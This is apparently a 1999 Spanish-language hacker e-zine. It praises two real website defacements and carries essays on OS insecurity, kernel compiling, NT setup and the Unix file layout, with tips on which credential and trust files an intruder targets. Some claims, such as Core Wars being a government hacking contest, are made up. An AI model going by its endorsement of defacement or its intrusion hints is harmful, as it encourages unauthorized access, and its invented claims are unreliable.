  Hace  ya  algunos meses  fu�  hackeada  la  p�gina de Planeta Urbe, un
  conocido  peri�dico  de circulaci�n  semanal  (creo, yo no  compro esa
  yaga), por Hackzeus, sin duda un trabajo impecable, lo que yo llamar�a
  un Hack  Art�stico =) el  t�tulo de la p�gina fu�  cambiado de Planeta
  Urbe a Planeta Ubre, jeje as� como tambi�n  fu� alterado  el contenido
  con palabras  de repudio  al trabajo realizado por dicho peri�dico, lo
  pueden   ver   por  uds.  mismos  ya  que  la  p�gina  fu�   subida  a
  http://members.xoom.com/planetaubre para  quienes  no  pudieron ver la
  p�gina en ese momento.

  El 01/11/99 fu� hackeada la  p�gina  del CNU (www.cnu.gov.ve)  por  el
  pana Supreme, este hack fu� realizado en apoyo a las tarifas planas  y
  en  contra del  monopolio de  la fucking CANTV, creo que ya a cantv no
  le   quedan   muchos  simpatizantes  :-|, la  web   hackeada  est�  en
  www.2600.com.


   ����������������������������������ͻ
��͹ Sistemas Operativos 100% Seguros ����������������͹Teken Melocotoff������
   ����������������������������������ͼ

  No existen, y aqui detallar� por qu�.

  Mucho  se  ha  mencionado sobre unix, y todas las t�cnicas  utilizadas
  para  hackear. Pero  ultimamente he escuchado que la raz�n por la cual
  se enfoca el hack a  unix es  porque Nt es  invulnerable.  FALSO.  Mas
  distante de la realidad no  pudo  haber  estado  este comentario. Aqui
  dare una introducci�n al tema.

  1: Unix- En el  principio  de la  arpanet, se  necesitaba  un  sistema
  operativo que fuese capaz de comunicarse eficientemente en un ambiente
  de red, y  tener  suficiente  flexibilidad para poder  economizar a lo
  m�ximo  sus  recurso  mientras  que  a  la  vez  le  proveia soporte a
  m�ltiples usuarios. El sistema operativo que salio a relucir fue unix.
  Dado que en esos d�as los �nicos que ten�an acceso al Arpanet eran los
  que estaban involucrados con la arpanet, la seguridad en este  sistema
  operativo erase casi nulo, una formalidad, ya que la idea era que toda
  la informaci�n en estos servidores deber�a ser libremente  distribuida
  dentro de la red. Luego,  mediante la red  fue creciendo, la necesidad
  se hizo evidente, y el  sistema  unix pudo  implementar  un sistema de
  seguridad  que  sigue   siendo  utilizado  a  la  fecha,  con  ciertas
  variaciones.

  Ahora las debilidades de unix son la siguente:

      1. No es un sistema operativo dirijido a la seguridad. Tengamos en
      mente que unix fui dirijido para facilitar  el  intercambio  LIBRE
      de  archivos  y  la  seguridad  fue  un aspecto secundario. Por lo
      tanto,  unix  no  es  tan  seguro  como si hubiese sido creado con
      seguridad  en  mente. Por eso que se ve que muchas distros/sabores
      vienen  sin  los  password  shadowed,  y  que  luego  le  toca  al
      administrador decidir si lo implementa o no.

      2. Facilidad  de  modificar  el  c�digo  del sistema operativo. El
      sistema  unix  se  creo   con  el  programador  en  mente.  Si  el
      administrador   de   sistema  encuentra  una   dificultad  en  una
      implementaci�n de etc, el mismo  tiene acceso  al codigo fuente, y
      puede  modificarlo  de  imediato,  para resolver el problema y no
      esperar que los productores saquen un fix. Esta facilidad  tambi�n
      es una debilidad. Un ejemplo  habla por si  solo. En  koan hace un
      par de meses, se dio a conocer que mysidias habia  conseguido root
      en koan. Recolectando informaci�n de crontab, el/ella pudo ver que
      entre los trabajos que realizaba habia una compilacion mensual  de
      ping.c. Lo  que  el/ella hizo entonces fue modificar el ping.c  lo
      suficiente para crear  un backdoor. Esta es una situaci�n  idonea,
      claro esta, pero  muchas  variantes  se  pueden dar, solo falta la
      imaginaci�n, y conocimiento de programaci�n  para  poder  crear  e
      imaginar nuevas implementaciones.

      3. Documentaci�n de los holes. Esta es un arma de doble filo. Cada
      vez  que  se  publica  un  exploit, se hace con  la  intenci�n  de
      advertirle  a los  administradores de sistemas de una debilidad en
      su sistema, pero  tambien a la vez con el conocimiento que alguien
      puede utilizar la informaci�n para atacar el sistema.

      4. Bugs y Holes. Nadie es perfecto.

  Las debilidades de los sistemas  operativos  windows95/98/NT (de ahora
  en adelante win) son muy similares a las que  tiene unix, excepto  con
  el sabor  �nico  y  distinto que le a microsoft a todos sus productos.
  Veamos:

  1.Windows95/98/NT/2000 - se creo con la facilidad de uso e instalaci�n
  en mente. Seguridad aqui mas que en ning�n otro lugar es cosa de risa.
  Los archivos de .pwl que definen  los  usuarios son f�cilmente  vistos
  por  cualquiera, y sus  demas medidas de seguridad son  como hechas de
  relajo. Mucho  se dice  que  las  m�quinas win son mas seguras que las
  Unix. Falso. Los  hackers y los  administradores  prefieren a unix por
  que  es  robusto, y  por  lo tanto, ha de contener la informaci�n  mas
  importante.  Los  servidores  nt  se  les  pone  como  backups  de los
  servidores en unix, o  realizando  tareas  que  no  requieran de mucha
  seguridad. Por lo tanto veran  muchas veces que el  servidor principal
  en una  red es  una unix, con  una que  otra nt haciendo  una que otra
  tarea. Por esa misma insignificancia que se le da a los nt es que  los
  hackers le hacen caso omiso, y cuando se presentan  con una, no  saben
  que hacer.

      1. Seguridad por  oscuridad. La  l�gica  de  esto  es que si nadie
      sabe como  funciona, no podr�n  descubrir  como hacer que funcione
      distinto.  Falso. Cualquiera que tenga  en sus  manos  el  sistema
      operativo  puede   someterlo  a  pruebas   rigurosas   a   ver  su
      comportamiento, que es lo que hacemos  los hackers, y lo  que  los
      administradores deber�an hacer tambi�n.

      2. C�digo fuente secreto. Que  significa esto? Pues que el  c�digo
      fuente de los  sistemas operativos  es un secreto,  y esto  genera
      ciertos  problemas que ya se conocen muy bien. Un administrador se
      ha  dado  cuenta  que  su sistemas tiene una hueco de seguridad, y
      avisa a redmond para que saquen un patch. Como el administrador no
      tiene el codigo fuente en sus manos no puede:

			 a. solucionar el problema el mismo
			 b. especificar cual es el problema

      Por lo tanto los  programadores  en redmond  tienen que revisar el
      c�digo para  ver si  ellos encuentran  el  problema. Una vez hecho
      eso, tienen que sacar el patch  lo mas r�pido posible,  pero  como
      nada mas  son  unos  cuantos  en ves de una comunidad  entera, les
      toma tiempo. Mientras tanto el administrador es presa de ataques y
      no  puede  hacer  nada.  Cuando  por  fin  salga  el patch, o este
      presenta otro hueco por mala  programaci�n,  activa un  hueco  que
      antes no  se presentaba, o simplemente sale a relucir otro  hueco,
      y de nuevo el ciclo.

      3. Publicidad. Microsoft se rige mucho por la publicidad. Ellos en
      vez de sacar un producto cuando est�  listo y preparado, lo  sacan
      cuando las estad�sticas  dicen que el  mercado esta favorable.  Si
      derepente  el  mercado  esta  favorable, y el sistema operativo no
      esta listo, asi mismo mandan el sistema operativo para el mercado.
      De aqu� viene buena parte de los huecos que encontrar�n en win.

      4. Mala  programaci�n. simplemente  no se  le da la  importancia a
      estudio de los algoritmos usados,  para evitar  futuros percances.
      Para cada SO que haya sacado windows, hay un sin numero de patches
      que hay que  instalar porque alg�n  consumidor  se  percato  de un
      problema mientras  usaba su m�quina,  situaci�n que debi�  haberse
      prevenido y solucionado antes de que el producto salga al mercado.
      Para  los  que  usan NT ya es  bien sabido  que  para  implementar
      cualquiera sombra de seguridad  deben instalar service pack 1-4  y
      power pack  o algo pack 1-4. y  a�n as� no  termina nunca. windows
      2000  no  es  mas  que  un  gigantesco  parche a todos los errores
      pasados. Y tambien  aqui es el  punto  principal  por donde atacar
      win. ejemplos famosos, los nukes. Alguien jugando con los socks de
      windows vio una falla, y  creo los  nukes. No hay  una  versi�n de
      windows que no  sea  vulnerable a  casi  todos estos nukes, y para
      cada  parche  que sacan sale  una mutaci�n  nueva, PARA  LA  MISMA
      DEBILIDAD. osea que los parches nada mas tapan por encimita, y  no
      sirven  para  proteger  totalmente. Y tambi�n  los  famosos ping o
      death, no hay m�quina  que se le resista, NI PARCHE TAMPOCO, M$ ha
      hecho caso omiso de el nuke mas simple que existe, un simple ping.
      Y  por eso, con nukenabber o con upgrade o con patch o con win98 o
      con nt, todos los sistemas win son presa facil de el ping o death.
      Increible.

      5. Mal soporte. De nuevo,  si se presenta  un problema, los chicos
      de redmond son duros para  admitir  sus errores.  Recientemente se
      public� un  art�culo  detallando  que el 90% de los  servidores de
      microsoft (IIS) son vulnerables A UN SOLO EXPLOIT,y esto que no se
      han  documentado  los   demas.  Los  especialistas   en  seguridad
      advirtieron a microsoft  del  problema, pero  ellos hicieron  caso
      omiso, y los se�ores publicaron el art�culo como obligacion moral.
      Todavia se espera que M$ diga o haga algo.

      6. Bugs y holes. Nadie es perfecto, y menos M$.

  Hemos visto que unix y win presentan muchas faltas, algunas similares,
  otras distintas. Pero si estos no son sistemas seguros, cuales son?

  *En la monta�as rocallosas de los estados unidos 1.5  kilometros  bajo
  toneladas  de  piedra  y  monta�a,  se  encuentran  una  de  las redes
  militares mas completas y seguras del mundo.

  Aparte de tener monta�as como techo, la seguridad incluye:

  * El  complejo esta  seccionado  en forma  de matriz,  para que ning�n
    impacto unico pueda destuir la totalidad de complejo

  * Los salones tienen muros y techos de concreto reforzado  de mas de 2
    metros y medio, mas una capa de acero y cobre para recibir impacto y
    proteger de interferecia electromagn�tica.

  * Las  conexiones  entre  las  m�quinas  se  hace  a trav�s de  cables
    reforzados  encapsulados  en  un  tubo de  acero con forro de cobre,
    cubierto por otro tubo  de concreto. en  caso que  un cub�culo de la
    matriz sea destruido, una pared de concreto reforzado de 2 metros de
    espesor, ademas de dinamita que causar un derrumbe de ambos lados de
    la pared, efectivamente cortan  la comunicaci�n y cualquier  intento
    de ingresar a otro cub�culo.

  * Propio sistema operativo (probablemente resultado de core wars)

  * Dios sabra  que otras cosas tendra  (extraido de la  serie time life
    sobre   computadoras,  los  libros  de  aplicaciones   militares   y
    seguridad).

  Otros:

  Core wars es un wargame  auspiciado  por el gobierno de los estados en
  el cual solo  participan  los  mejores  hackers del mundo. Esto es por
  invitaci�n claro esta. Como funciona? facil, la idea es tomar posesi�n
  de una  mainframe a como de  lugar, incluyendo  desactivando los demas
  competidores. Asi que como hacen para seguir en el juego sin  que otro
  hacker lo saquen?  Crean sus  propios sistemas operativos. Estos no se
  basan en  ningun  kernel  que  se  conozca,  sino que  ellos tienen el
  conocimiento,  la  habilidad,  y la  capacidad  para crear sus propios
  sistemas  operativos.  Claro  esta  que  tienen  que  implementar  los
  protocolos utlizados, pero cuando tu inventas tu  sistema operativo no
  es  ning�n  problema  asegurate  de implementarlo de forma segura. Una
  cosa si, no obstante que tan seguras son, no son al 100%. La seguridad
  total de un sistemas indica que para que este no corra riesgos no debe
  existir, y eso es  imposible, asi  que nos podemos  acercar al 100% de
  seguridad, pero nunca alcanzarlo!. Es como la velocidad de la luz.  De
  estos sistemas  operativos  es  problable  que  haya nacido el sistema
  operativo que utilizan en el bunker  en la rocallosas (la localidad  y
  algunas de las medidas de seguridad  de el bunker son dominio p�blico,
  lo demas, top secret que mas va ser).

  Todav�a  nos  falta mucho para  poder estar a ese nivel, pero para eso
  tenemos  que  comprender  y  utilizar  el  conocimiento  de que ning�n
  sistemas operativo es seguro, y por ahi tenemos que comenzar.

           Teken Melocotoff              
Escojamos. Seremos lobo, pastor, u oveja. 
           www.hven.com.ve              
           public.cwp.net.pa/~jomasa     

   ����������������������ͻ
��͹ Compilando el Kernel �������������������������������������͹DoctorX������
   ����������������������ͼ

  El Kernel en sistemas Unix es el mediador entre el software y hardware
  ya que en  estos sistemas ning�n  programa o aplicaci�n  tiene  acceso
  directo  al  hardware, ya que solo se accede a el a trav�s del kernel.
  Cada Vez que compila el kernel estamos reconstruyendo todo el software
  que manejar� la interacci�n con el  hardware y muchas veces ocurre que
  cierto   nuevo   hardware  que  acabas  de  adquirir  no  te  funciona
  simplemente porque no existe el controlador para ello, o porque no fue
  incluido en tu configuraci�n del  kernel, por estas cosas es necesario
  recompilar el kernel.

  Cuando el Linux se instala coloca una configuraci�n del Kernel Standar
  o sea te coloca los controladores mas  utilizados, pero muchos de esos
  Controladores son para un HardWare que no tienes en tu maquina por eso
  los drivers de  ese  hardware solo  ocupan espacio en tu memoria. Para
  optimizar la configuraci�n de tu kernel debes recompilarlo y para ello
  debes estar seguro de que posees las fuentes del kernel. 

  Si deseas obtener las fuentes del kernel puedes  visitar estos  sitios
  FTP o probar en kernel.org.
 
        
  USA:         sunsite.unc.edu:/pub/Linux/kernel
  USA:         tsx-11.mit.edu:/pub/linux/sources/system
  UK:          sunsite.doc.ic.ac.uk:/pub/unix/Linux/sunsite.unc-mirror/kernel
  Austria:     ftp.univie.ac.at:/systems/linux/sunsite/kernel
  Alemania:    ftp.Germany.EU.net:/pub/os/Linux/Local.EUnet/Kernel/Linus
  Alemania:    sunsite.informatik.rwth-aachen.de:/pub/Linux/PEOPLE/Linus
  Francia:     ftp.ibp.fr:/pub/linux/sources/system/patches
  Australia:   sunsite.anu.edu.au:/pub/linux/kernel
  Venezuela:   kernel.linux.org.ve/pub/linux/kernel/v2.2/linux-2.2.10.tar.bz2

  Pasos para Recompilar el Kernel:

  1.- Identifica  el  hardware  que posee tu m�quina (tarjetas de audio,
      video cdrom drive, hd etc)

  2.- # cd /usr/src/linux

  3.- # make menuconfig o en X-WIN =======> #make xconfig

  4.- En este Punto debes seleccionar los controladores y demas opciones
      que estaran disponibles en el kernel.

    Y      - significa SI
    M      - Modulo o incluir como un modulo
    N      - excluir
     
  5.- Selecci�n de los Modulos y Controladores disponibles.
    
        Code Maturity Level Options
        ---------------------------
  Esta parte si usted la activa se le preguntara a usted por drivers que
  falten o por los c�digos completos de los drivers que no lo est�n.

        Proccesor Types and Features
        ----------------------------
  En  esta  secci�n  usted  puede  cabiar  el  tipo de arquitectura para
  optimizar el kernel por defecto aca esta seleccionado "386" pero usted
  puede  cambiar  esto  por  pentium  o  cualquier otro disponible y mas
  adecuado a su procesador, la  ventaja es que  un kernel compilado para
  386 puede ser cargado  en cualquier  arquitectura x86 mientras  que un
  kernel  para pentium es para  pentium. En esta parte si su  maquina no
  posee coprocesador  matem�tico como  sucede  con las 386,486 y algunas
  pentiumusted puede  agregar "kernel Math Emulation" para que el kernel
  se encarge de esa funci�n.

        Loadable Module Support
        -----------------------
  Esta  parte es importante ya que para que el kernel sea mas r�pido  se
  puede habilitar que los controladores sean cargados por modulos asi se
  podr�  tener un controlador cargado en memoria solo cuando se necesite
  sin tener que recompilar el kernel.

        General Setup
        -------------
  En  esta secci�n se eligen las opciones generales que tendra el kernel
  como lo son:

     1.- Networking Support : Soporte para trabajo en Red.
     2.- PCI Support : Soporte para dispositivos PCI.
     3.- Kernel Support for a.out binaries: soporte para binarios a.out
         al igual que este existen opciones para poder utilizar binarios
         de JAVA,ELF y MISC.
     4.- Parallel Port Support : Soporte para los dispositivos que
         utilizan puerto paralelo asi como lo son las impresoras y  ZIPs
         drive.

  Estas son algunas de las opciones disponibles.
 
        Plug and Play Support
        ---------------------
  Si Activa esta opci�n tendra soporte para dispositivos PNP.
 
        Block Devices
        -------------
  Esta  parte  es la referente a los dispositivos tipo bloque tales como
  discos duros, unidades de CD,SCSI y floppy disk.

        Networking Options
        ------------------
  Esta  parte  en  la configuraci�n del Kernel habilita las opciones  de
  controladores  para  los  trabajos  de  red  tales  como Masquerading,
  Firewalling, algunos  Protocolos Especiales como IPX, enrutamiento  de
  paquetes (router), filtrado de Sockets y Proxy entre otras.
 
        SCSI Support
        ------------
  Activa el soporte para dispositivos SCSI, le presenta una lista de los
  Drivers  disponibles  para ciertos Dispositivos tales como Unidades de
  CD, y otras tarjetas SCSI, d�ndole la oportunidad de escojer.

        Network Device Support
        ----------------------
  Activa  el  Soporte para el  hardware o interface  para trabajo en red
  tales como las NIC, ademas de algunos protocolos como PPP y PLIP.
 
        Amateur Radio Support
        ---------------------
  Active esta opci�n si desea conectar su Linux Box a un Radio.
 
        IrDA Subsystems Support
        -----------------------
  Si  activa  esta  opci�n usted  podr� utilizar Medios Infrarojos  para
  manejar datos, o sea tendra soporte para esos protocolos.

        ISDN Support
        ------------
  Esta opci�n  habilita  el  soporte  para  conexiones  ISDN (Integrated
  Services Digital Networks), este tipo de conexi�n es muy utilizada con
  PPP y PLIP  para conectarse  con algunos ISP mediante un tipo especial
  de telefon�a digital.
 
        Old - CDROM Drivers
        -------------------
  Soporte para unidades de CD que no son IDE o SCSI.
 
        Character Devices
        -----------------
  En esta secci�n se activa el soporte para terminales virtuales, manejo
  de mas de 4 puertos seriales, autodetecci�n de las IRQs en los puertos
  estandard, soporte para mouse no seriales etc.

        FileSystems
        -----------
  Esta  parte  incluye  el  soporte para distintos tipos de sistemas  de
  archivos o File Systems que seran soportados por el kernel tales  como
  VFAT (WIN9X), MSDOS, ISO 9660 (para CDs), Amiga y Apple entre Otros.
 
        Console Drivers
        ---------------
  En esta parte se coloca el soporte para los drivers que son utilizados
  en la consola para manejo de tarjetas de video y monitores.
 
        Sound
        -----
  En este Punto se Incluye el Soporte para las Tarjetas de Sonido.
 
        Kernel HAcking
        --------------
  Con  esta  opci�n  podras  tener  acceso a ciertas informaciones en el
  buffer y vaciarlas  en un  disco en  caso de que tu m�quina se cuelgue
  por nombrar alguna funci�n.
 
  Luego  de  haber  contestado todo lo referente a que modulos y soporte
  incluir  en el  kernel entonces debe seleccionar la opci�n "EXIT" para
  guardar la configuraci�n en el archivo de  configuraci�n  o seleccione
  "Save   Configuration   to   an   Alternate   File"  para  guardar  la
  configuraci�n en otro archivo. 


  6.- # make dep

  7.- # make clean

  8.- # make zImage
     
  Despu�s de este �ltimo paso usted tendra ya compilado el nuevo kernel,
  puede  ser  que  usted  vea  un  error dici�ndole que la imagen es muy
  grande o algo por estilo, eso sucede por el tama�o del kernel o porque
  el  kernel  no  esta  colocado  donde  dice  el  lilo  que  esta. Para
  solucionar lo  ultimo usted debe mover la imagen "vmlinuz" a la raiz o
  a otro directorio  de su  preferencia, luego edite el /etc/lilo.conf y
  observe la linea que dice:
              
  image=/boot/vmlinuz   <===== esto puede cambiar

  La esencia  esta en  cambiarle esa  l�nea  d�ndole la  direcci�n de el
  nuevo  kernel  compilado,  si  movemos  la  nueva  imagen  a  la  raiz
  colocamos:
             image=/vmlinuz
    
    Luego de hacer esto sigue:
  
  #lilo enter
 
  luego  se  debe  reiniciar  la maquina  si en el arranque  no sale  un
  mensaje  que  diga "Kernel  PANIC"  entonces  todo  esta  bien  de  lo
  contrario debera volver a  reiniciar en  modo de  rescate para colocar
  nuevamente la imagen anterior del kernel o  mejor que  esto  en vez de
  utilizar "make zImage" utilice "make zdisk" y  te  crea la  imagen del
  kernel en un disco 3 1/2 de esta manera al  reiniciar  si le  mandas a
  leer desde el floppy entonces te carga el nuevo kernel desde alli y en
  caso  de  tener  problemas lo �nico que necesitas es  reiniciar y todo
  esta como antes.
  
========================================================================
DoctorX  email: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
[
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ]
http://www.hven.com.ve  Hackers Venezuela
http://bactery.8m.com   Bactery - LabX
comentarios enviarlos a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ,
flames enviarlos a /dev/null
========================================================================

   ����������������������������������������ͻ
��͹ Algunos Tips para la instalaci�n de NT ������͹DunkelSeite - Merlin������
   ����������������������������������������ͼ

                **************************************
                Escrito en Notepad+ (Win95) para HVEN
                Por: Dunkelseite - 23/05/1999 (1:17am)
                Merlin 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  
                Web site: NO, gracias a Xoom.
                **************************************

  En  este  art�culo se explican (de forma sencilla)  algunos "trucos" o
  "tips"  para la  instalaci�n  de  Windows  NT 4. Fue  escrito  con los
  apuntes  que  tengo  de una  conferencia que asist� sobre microsoft NT
  server/WorkStation. Lo que hago es  escribir  lo  que me  pareci�  m�s
  importante (lo dem�s fue un poco aburrido y trivial).

  * En el directorio "/support" (dentro de NT) existe un archivo llamado
    "HCL" (Hardware Compatibility List) en la que hayar�s  un listado de
    todo el Hardware compatible con esa versi�n de NT.

  Recomendaci�n: Lee  esa  lista  antes  de  instalar  NT 4  o  si est�s
  prestando un servicio a terceros.

  * �C�mo  hacen  IBM, Compaq, Dell, etc para tener un NT pre-instalado?
    Muy f�cil. Para crear un "disco de preinstalaci�n" de NT debes tener
    un  Disco  Duro  que  se usar� como "master" y simplemente sigue los 
    siguientes pasos:

     a) Ejecuta el "Setup Manager" y espera  que se complete la
        "primera etapa" de este proceso. En  esta etapa s�lo se
        copian archivos y no se detecta hardware, por lo tanto,
        cuando reinicie el computador, ap�galo y desconecta  el
        Disco Duro. Ya tienes el disco que usar�s como "fuente"
        para las futuras instalaciones de NT server.

     b) Copia el contenido  del Disco "Fuente" en el  disco que
        se instalar� NT server (al que llamaremos "destino").

     c) En   el   directorio   "$winnt$.~ls/i386"   del   disco
        "destino",  edita el  archivo "dosnet.inf" y  coloca un
        comentario  en  la l�nea  de "interserv" si  no  deseas
        instalar el Servidor Web "Internet Information Server"
        (IIS).

     d) Coloca  el  Disco  duro  "destino" en  el  computador y
        enci�ndelo.

  * Publicaci�n recomendada por el expositor de MS:

    "Windows open System Architecture".

  * Perfiles  de  usuario: Cada usuario posee un perfil  que le  permite
    acceder  (o no) a programas, directorios, impresoras, etc. Adem�s de
    cosas como protector de pantalla, fondo del desktop, etc.

  Existen dos tipos de perfil. Local: Este perfil se graba localmente, o
  sea, en el computador del usuario.

  N�mada (ROAM): El  perfil  se  graba  en  el servidor y la Estaci�n de
  Trabajo (E/T) la lee de el.

  Notas: Si  los  usuarios  poseen  diferentes  Sist. Operativos Windows
  (95/98/WorkStation), debe trabajarse con "Perfil local".

  Ahora,  el  trabajar  con  "perfil local"  da la posibilidad de que un
  intruso  pueda  tomar este perfil de la E/T y utilizarlo para penetrar
  en la red.

  Si  se  utiliza  perfil  N�mada,  es recomendable renombrar el archivo
  "ntuser.dat"  (que  est�  en  el  servidor)  por  "ntuser.man"  (man =
  mandatory). As� el usuario no puede cambiar su perfil.

  Tambi�n  se  recomienda  crear  directorios  para  cada  usuario en el
  servidor y  obligar  a que no graben ning�n tipo de informaci�n en sus
  discos duros. Su usamos estaciones "MS WorkStation" podemos denegar al
  usuario permisos para que grabe data localmente.

  El expositor de MS hizo incapi� en que NT Server es inviolable  ya que
  utiliza  un m�todo  de encriptamiento de passwords de 128 bits. bueno,
  todos  sabemos  que  siempre  hay un "hueco" por donde entrar, pero si
  somos administradores de uns Red NT, el seguir los consejos anteriores
  nos ayuda a incrementar la seguridad.

  * Otro  punto  que  se toc�  fue  el  de c�mo  hacer  para evitar que la
    impresi�n de documentos trabaje lentamente en la red.

  Soluci�n: "jugar"  con  las  prioridades de los programas, usuarios de
  impresi�n, etc.

  Cuando se  trabaja con un programa de facturaci�n creado (por ejemplo)
  en Foxpro, podemos  bajar la  prioridad de este programa para permitir
  que la impresi�n de dichas facturas sea m�s "flu�das".

  �C�mo hacerlo?, escribimos:
  NET START "aplicaci�n.exe" /LOW (� "/HIGH", "/NORMAL")

  * Para capturar puertos de impresi�n para programas basados en DOS:
    NET USE LPT1 \servidor\impresor

    Ejemplo: NET USE LPT1 \server1\epsonlx300

  * Actualizaciones:
    Si trabajamos con NT server se debe instalar el Service pack 4  para
    corregir ciertos problemas Y2K (a�os 2000)  para  actualizar el IIS2
    al IIS4 debemos instalar el "Option Pack 4".

    Si  queremos  actualizar  NT server  y  el  IIS 2, entonces  debemos
    instalar  primero el "Option Pack 4" y luego el "Service Pack 4", no
    al rev�s.

  * El  archivo  "pnpisa.inf" (que est�  en el Cd de NT) es recomendable
    instalarlo  si  tenemos que  trabajar con una tarjeta ISA que sea un
    tanto  "fastidiosa". El  archivo  "pnppci.inf"  nos  ayuda  con  las
    tarjetas PCI, pero est� en el Web site de MS en la zona de "Soporte"

  * Para  instalar Office e Internet Explorer 4 de  forma autom�tica con 
    las opcines "t�picas", haz la instalaci�n de la siguiente forma:

     a) Para Office NO OEM:
	instalar /Q1 /K "serial del office"

     b) Para Office OEM:
	instalar /Q1 /C "serial del office"

     c) IE4:
	ie4setup /Q

  * Windows 98: En  el  directorio "/win98/tools/admin" se encuentra  un
    programa (el �nico que  hay ah�) que permite crear pre-instalaciones
    de Windows 98.

  * Windows 98: Comandos en la instalaci�n

/is Instala sin comprobar el sistema
/iw Instala sin informacion de copyright
/id Instala sin verificar el espacio libre

  * Windows 98: Para que  scandisk no se active autom�ticamente luego de
    que windows  se cuelgue (cosa muy frecuente, vamos a inicio/ejecutar
    y escribimos:

msconfig

  Y buscamos avanzado y ah� marcamos  la opci�n desactivar sandisk luego
  de un apagado incorrecto.

  * Windows 98: Logo de nuestra empresa
    En muchos sistemas de prestigiosas  marcas (Dell, IBM, Compaq, etc.)
    vemos  que  cuando  entramos  a  las  propiedades del sistema (panel
    control/sistema o pc/propiedades) tiene  el logo del fabricante y un
    bot�n donde usualmente se encuentran los telefonos de  soporte de la
    empresa.

  Para hacer esto necesitamos un gr�fico de 160x120 pixels que  vamos  a
  nombrar oemlogo.bmp en el directorio system de  windows  y otro que se
  va a llamar oeminfo.ini que debe ser as�:

[general]
Manufacturer=
Model=
[Support Information]
Line1= 
Line2= 
Line3= 
Line4=
Line5= 
Line6=

  El  bot�n  con de  soporte no aparecer�  si dejamos los parametros  en
  blanco (line 1, 2, 3, etc.)

  * Algunos links interesantes:

http://www.solucionesnt.com
http://www.itok.com
http://www.microsoft.com/year2000
http://www.microsoft.com/ntserver
http://www.microsoft.com/oem. En  este  site  se recomienda registrarse
  para luego poder acceder a: http://oem.microsoft.com. Aqu� hay trucos
  y consejos.

  Tambi�n  pueden  registrase  en  la zona de "tech net" de Microsoft y
  podr�n recibir  invitaciones  para  talleres  (muchos gratuitos).  No
  olviden hacerlo en la zona correspondiente a su pa�s de origen.

   ����������������������������������������ͻ
��͹ Estructura de ficheros bajo Unix/Linux ����������͹Supreme - Merlin������
   ����������������������������������������ͼ

  Una de  las cosas  fundamentales  que hay  que conocer a la hora de un
  hackeo a un sistema Unix/Linux es que hay en cada fichero de este y en
  general conocer el sistema ext2. Aqui veremos que hay en las  carpetas
  y asi conoceremos mas a fondo este sistema operativo.

  En  el  directorio  ra�z (o  punto  de  montado)  se  encuentran   las
  siguientes carpetas o subdirectorios:

#/bin/:

  En  este  encontraremos  los  archivos  ejecutables  de  las   ordenes
  esenciales  para el sistema. Son ordenes que cualquier  usuario  puede
  emplear pero que deben estar disponibles bajo cualquier circunstancia.
  Si estos archivos se pierden no podremos iniciar el sistema. 

#/boot/:

  Aqu�  est� toda  la  informaci�n  utilizada  por el  cargador de linux
  (LILO), b�sicamente esta es la carpeta que utiliza linux  para iniciar
  el sistema, aqu� se encuentran los niveles de arranque.

        Niveles de arranque (David Rubio)

  En Solaris  (y en Linux) hay 6 niveles de ejecuci�n, que son modos  de
  funcionamiento  del sistema. Depende de en que nivel estemos,  estar�n
  corriendo unos servicios u otros.

  Nivel 0: Es el nivel de la PROM (Programable ROM)
  Nivel 1: Estado administrativo (modo monousuario con algunos  sistemas
  de fichero montados y con el acceso para usuarios deshabilitado)
  Nivel 2: Multiusuario (sin recursos compartidos)
  Nivel 3: Modo multiusuario con recursos compartidos (ES  EL NIVEL  POR
  DEFECTO)
  Nivel 4: No usado 
  Nivel 5: Parada el�ctrica (solo puede hacerla root) 
  Nivel 6: Rearranque y vuelta al nivel 3 
  Nivle S,s: Monousuario. Sin  acceso de  usuarios (se emplea para hacer
  copias de seguridad)

  Ah se me olvidaba,  cambiar de  nivel es  tan  f�cil  como hacer  init
  nivel. Lo mas frecuente es el init 0 para rearranque desde la PROM (en
  plataformas intel no funciona ya que no tienen la PROM) En el arranque
  de Solaris, una vez que se ha cargado el Kernel (nucleo  del UNIX)  se
  arranca el proceso init (/sbin/init). Este proceso lee la  informaci�n
  del  fichero /etc/inittab que le indica que procesos ha de levantar en
  cada nivel.

  Para cada nivel de ejecuci�n existe un directorio /etc/rc#.d (es decir
  /etc/rc1.d, /etc/rc2.d .....) En cada  uno de  estos  directorios  hay
  ficheros S* y K* (que  empiezan  por  S y K). Los  que  empiezan por S
  (start) son para arrancar procesos  los que  empiezan  por K  son para
  matar  procesos  (Kill)  Como  el  nivel  0  es  para  rearrancar,  el
  directorio /etc/rc0.d solo contiene ficheros K* para matar procesos.

#/dev/:

  Archivos asociados a dispositivos, O sea el cdrom,  floppy, el  puerto
  de la impresora, los terminales, etc.

#/etc/:

  jejejeje Aqu�  hay archivos de configuraci�n del sistema. El  que  mas
  resalta  es el  passwd (y el shadow en muchos  servidores)  que  tiene
  el  la contrase�a de los usuarios encriptada, tambi�n  esta el archivo
  hostname, hosts, host.allow y host.deny que son archivos importantes a
  la hora del hack  ya que ah� est�n los servidores confiables desde los
  cuales posiblemente no se necesite autentificaci�n.

#/home/:

  Este es  el directorio  casa  de cada usuario,  generalmente  se hacen
  subdivisiones de este para los usuarios, tambi�n  se  puede  encontrar
  las p�ginas del httpd, ftp y samba aqui (usualmente).

#/lib/:

  Aqu� est�n  las bibliotecas de  enlace  din�mico  necesarias  para las
  ordenes de /bin y /sbin

#/mnt/:

  Aqu� es  donde generalmente se monta el cdrom o el floppy, particiones
  del disco duro (msdos por ejemplo).

#/proc/:

  Sistema de ficheros virtual con informaci�n sobre el estado del nucleo
  y los procesos en ejecuci�n. Tambien contiene la actividad  del kernel
  y de  todos  los  dispositivos  de  hardware  y procesos  que se est�n
  ejecutando  en el  sistema, o  sea si  quiero saber  que  hardware  me
  reconoci�  entro  all� y lo  veo o si quiero  saber que recursos est�n
  ocupados como memoria libre disco duro etc

#/root/:

  Este es el  direcorio casa  del root o superusuario,  aqu� es un  buen
  sitio para buscar archivos shadow sin protecci�n.

#/sbin/:

  Aqu�  est�n las  herramientas  esenciales  para  la administraci�n del
  sistema. Tambi�n  se  programan  scripts  para  la  configuraci�n  del
  sistema, Pero estos nada mas lo puede ejecutar el root

#/tmp/:

  Aqu� en  donde se almacenan los archivos temporales. las  aplicaciones
  guardan aqu� sus archivos temporales.

